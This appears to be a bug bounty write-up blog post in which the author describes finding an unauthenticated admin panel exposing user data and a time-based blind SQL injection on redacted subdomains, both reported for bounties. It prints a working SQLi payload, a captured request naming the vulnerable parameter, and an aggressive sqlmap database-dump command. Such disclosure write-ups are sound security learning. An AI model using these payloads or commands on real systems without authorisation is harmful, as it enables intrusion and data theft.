Unauthorized Access to Admin Panel & SQL Injection
Introduction
Hello, I am Anta Maulana or Parkerzanta in cyberspace. This time I will write about my findings on the Web which holds a Bug Bounty Program.
I found in April, and found 2 Critical Vulnerabilities namely SQL Injection and Unauthorized Access to Admin Panel or Unauthorized entry authorization to the admin Panel page, I can enter without being asked for any credentials!
I found the above 2 vulnerabilities did not take much time, can be calculated only a few minutes with the help of the Tools below for Recon
- Subfinder
- Httpx
- Waybackurls
- Dirsearch
- Sqlmap
Searching for Bug Bounty Program
I searched for a Bug bounty program using the following Goole Dork, and some sources on github
inurl:/bug bounty
inurl:/security
inurl:security.txt
inurl:security "reward"
Bug Bounty program "reward"
inurl:/responsible disclosure
inurl:/responsible-disclosure/ reward
inurl:/responsible-disclosure/ swag
inurl:/responsible-disclosure/ bounty
responsible disclosure "reward" site:com
responsible disclosure hall of fame
"powered by bugcrowd" -site:bugcrowd.com
"submit vulnerability report"
"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"
After searching on Google, I filtered the search results to look for programs that were published just a few weeks or months ago, as shown below.
What is Unauthorized Access to Admin Panel?
Unauthorized access to the admin panel occurs when someone manages to gain access to the administrator area of your website without permission. With this access, they can change website settings, delete or add content, or even steal sensitive information. This kind of attack can have a serious impact on the reputation and integrity of your website.
One common way used by attackers to gain unauthorized access to the admin panel is by guessing weak passwords or using “brute force” methods to guess strong passwords. In addition, attackers can also take advantage of vulnerabilities in the CMS software used by your website.
Short story of discovering the Admin Panel
Before searching for vulnerabilities, I did a Subdomain search first using Subfinder and HTTPX to see the Status Code of the Subdomain. The target has many subdomain names as follows
And I found a subdomain name xeon4.redacted.com with a response of 200 but when I open the above subdomain name, the page only displays the following text
Confused because it didn’t show anything:/ I continued to search for the endpoint using Waybackurl but it only showed the robots.txt file 😐 I didn’t just give up, I did a Directory Search with the help of Dirsearch Tools
And what can you guess? yups, I found an Admin Panel directory! Dirsearch showed a 200 Response for the /adminpage Directory My thought was that it might ask for a username and password to log in.
However, when I opened the directory I was able to enter the Admin Panel Page without being asked for any credentials at xeon4.redacted.com/adminpage
As you can see above, on the Admin Page there are other Credentials to enter other pages, and there are also several pages that display other users’ Sensitive Information such as Email, Credit Card, Address etc.
What is an SQL Injection Attack?
SQL injection attacks are attacks that are carried out by exploiting vulnerabilities in your website’s database. In this attack, the attacker inserts malicious SQL code into the input associated with the database, which is then executed by the database server. This kind of attack can lead to unauthorized access to sensitive data, database tampering, or even takeover of control over the server.
How I found SQL Injection
Let’s continue, after I found an Admin Page I didn’t stop there and decided to look for other vulnerabilities.
I found another subdomain that I discovered from the Admin Page above, see the URL I masked below
I opened the link above, and the page displayed a form where I could search for Documents, see image below
I intercepted a request while doing a document search, the directform parameter is vulnerable to SQL Injection attacks and I found an SQLI Time Based Blind Vulnerability by testing with a Payload.
'XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z
Request:
POST /xxxx/repository/xxxx? HTTP/2
Host: secure.redacted.com
Cookie: cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: https://secure.redacted.com
Referer: https://secure.redacted.com/xxxx/repository/xxxxx?
[...]
password=xxxxxx&directform=vulnerabilityhere
Respons
Sleep time 15s ‘XOR(if(now()=sysdate()%2Csleep(15)%2C0))XOR’Z
Sleep time 20s ‘XOR(if(now()=sysdate()%2Csleep(20)%2C0))XOR’Z
Since this is vulnerable to SQLI I decided to proceed to Sqlmap, and save the above Request with the following simple command
sqlmap -r request.txt -p directform — random-agent — level 5 — risk 3 — dbs — threads=10
I reported the above 2 Vulnerabilities to their email. After a few weeks of waiting, I was awarded a Bounty of $500 for SQLI and $1000 for Admin panel.
Thank you for reading my writing, don’t forget to give your applause 👏
Follow me at https://x.com/parkerzanta
[!] The source of this article comes from Parkerzanta Blog which I wrote in English.